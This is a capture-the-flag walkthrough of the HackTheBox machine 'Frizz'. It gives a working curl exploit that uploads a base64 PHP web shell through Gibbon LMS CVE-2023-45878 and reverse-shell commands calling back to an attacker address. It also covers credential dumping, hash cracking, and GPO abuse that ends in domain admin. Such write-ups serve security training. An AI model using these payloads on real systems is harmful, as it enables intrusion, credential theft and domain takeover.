Overview
The Frizz is a Windows machine on HackTheBox rated Medium. It's a full Active Directory attack chain: from exploiting a CVE in Gibbon LMS for initial access, through Kerberos authentication with cracked credentials, to domain admin via GPO abuse with SharpGPOAbuse.
| Property | Value |
|---|---|
| OS | Windows (AD Domain Controller) |
| IP | 10.10.11.60 |
| Domain | frizz.htb / frizzdc.frizz.htb |
| Difficulty | Medium |
| Key Techniques | CVE-2023-45878, Kerberos Auth, Hash Cracking, GPO Abuse |
Enumeration
Port Scan
The nmap scan reveals a typical Active Directory Domain Controller:
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH for Windows 9.5 |
| 53/tcp | DNS | Simple DNS Plus |
| 80/tcp | HTTP | Apache httpd 2.4.58 (PHP/8.2.12) |
| 88/tcp | Kerberos | Microsoft Windows Kerberos |
| 135/tcp | MSRPC | Microsoft Windows RPC |
| 139/tcp | NetBIOS | Microsoft Windows netbios-ssn |
| 389/tcp | LDAP | Active Directory LDAP (Domain: frizz.htb0) |
| 445/tcp | SMB | Microsoft-DS |
| 464/tcp | kpasswd5 | |
| 593/tcp | ncacn_http | RPC over HTTP 1.0 |
| 636/tcp | tcpwrapped | |
| 3268/tcp | LDAP | Global Catalog |
Add to /etc/hosts:
10.10.11.60 frizz.htb frizzdc.frizz.htb
The web server on port 80 redirects to http://frizzdc.frizz.htb/home/, running Gibbon LMS — an open-source school management platform.
Foothold
CVE-2023-45878 — Gibbon LMS File Upload
Gibbon LMS is vulnerable to an arbitrary file upload via the rubrics module (CVE-2023-45878). The vulnerable endpoint accepts POST requests with a crafted image parameter containing a base64-encoded PHP shell:
curl -v -X POST \
"http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
The base64 payload decodes to a simple PHP web shell. Once uploaded, it's accessible at:
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=<command>
Reverse Shell via PowerShell
Using revshells.com to generate a base64-encoded PowerShell reverse shell, then triggering it through the PHP web shell while listening with nc -lvnp 9001.
Credential Extraction
MySQL Database Access
The Gibbon LMS configuration file (config.php) contains MySQL credentials:
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!!?1';
$databaseName = 'gibbon';
Querying the database for user credentials:
.\mysql.exe -h localhost -u MrGibbonsDB -pMisterGibbs!Parrot!!?1 \
-D gibbon -e "SELECT username, passwordStrong, passwordStrongSalt FROM gibbonPerson;"
This reveals the salted hash for f.frizzle:
f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
/aACFhikmNopqrRTVz2489
Hash Cracking with Hashcat
The hash format is SHA-256 with salt (hashcat mode 1420). Creating the hash file in hash:salt format:
hashcat -m 1420 -a 0 hash.txt rockyou.txt
Result: Jenni_Luvs_Magic23
User summary:
| Field | Value |
|---|---|
| Username | f.frizzle |
| Full Name | Fiona Frizzle |
| f.frizzle@frizz.htb | |
| Password | Jenni_Luvs_Magic23 |
Kerberos Authentication
Since this is an Active Directory environment, we authenticate via Kerberos to get an SSH session.
Time Synchronization
Kerberos requires clock sync within 5 minutes of the DC. Disable NTP and sync manually:
sudo systemctl stop ntpsec
sudo systemctl disable ntpsec
sudo rdate -n 10.10.11.60
Configure /etc/krb5.conf
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
proxiable = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
Get TGT and SSH
getTGT.py frizz.htb/f.frizzle
# Enter password: Jenni_Luvs_Magic23
# [*] Saving ticket in f.frizzle.ccache
export KRB5CCNAME=f.frizzle.ccache
ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@frizz.htb
Important: The /etc/hosts entry must have frizzdc.frizz.htb before frizz.htb for the Kerberos ticket to resolve correctly.
User flag obtained.
Privilege Escalation
Lateral Movement — M.SchoolBus
While authenticated as f.frizzle, we discover another user: M.SchoolBus. A 7z archive in the Recycle Bin contains this user's credentials:
m.schoolbus:!suBcig@MehTed!R
This user has WriteGPLink permissions over Class_FRIZZ and DOMAIN CONTROLLERS — a path to domain admin via GPO abuse.
GPO Abuse with SharpGPOAbuse
The attack chain:
- Create a new GPO:
New-GPO -Name "doesnotmatter"
- Link it to Domain Controllers:
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
- Add M.SchoolBus as local admin via SharpGPOAbuse:
.\SharpGPOAbuse.exe -AddLocalAdmin -UserAccount M.SchoolBus -GPOName doesnotmatter
- Force group policy update:
gpupdate /force
- Get an admin shell with RunasCs:
.\RunasC.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r 10.10.14.242:9001
Alternatively, authenticate as M.SchoolBus via Kerberos:
getTGT.py frizz.htb/m.schoolbus
export KRB5CCNAME=m.schoolbus.ccache
ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes m.schoolbus@frizz.htb
Root Flag
PS C:\Users\Administrator\Desktop> cat root.txt
0beb123688935a9a16f6b133817f42b5
Attack Summary
Key Takeaways
- Gibbon LMS CVE-2023-45878 is a critical file upload vulnerability. Always keep web applications patched, especially on domain-joined servers.
- Salted hashes are only as strong as the password. SHA-256 with a salt still falls to
rockyou.txtif the password is weak. - Kerberos authentication requires careful setup (time sync, krb5.conf, correct
/etc/hostsorder) but is the standard way to interact with AD environments. - GPO abuse via WriteGPLink is a powerful AD escalation path. If a user can link GPOs to Domain Controllers OU, they can effectively become domain admin through SharpGPOAbuse.
- Always check the Recycle Bin. Deleted files often contain credentials, configuration files, or other sensitive data.